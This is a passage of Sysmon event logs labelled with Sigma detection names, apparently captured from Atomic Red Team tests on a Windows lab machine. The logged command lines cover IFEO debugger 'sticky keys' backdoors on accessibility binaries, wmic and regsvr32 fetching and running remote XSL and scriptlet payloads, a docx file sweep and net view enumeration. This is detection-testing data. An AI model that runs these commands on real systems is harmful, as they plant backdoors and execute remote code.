(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 
14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger 
ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor 
Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 
14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component 
Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct 
scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct 
scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 
14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
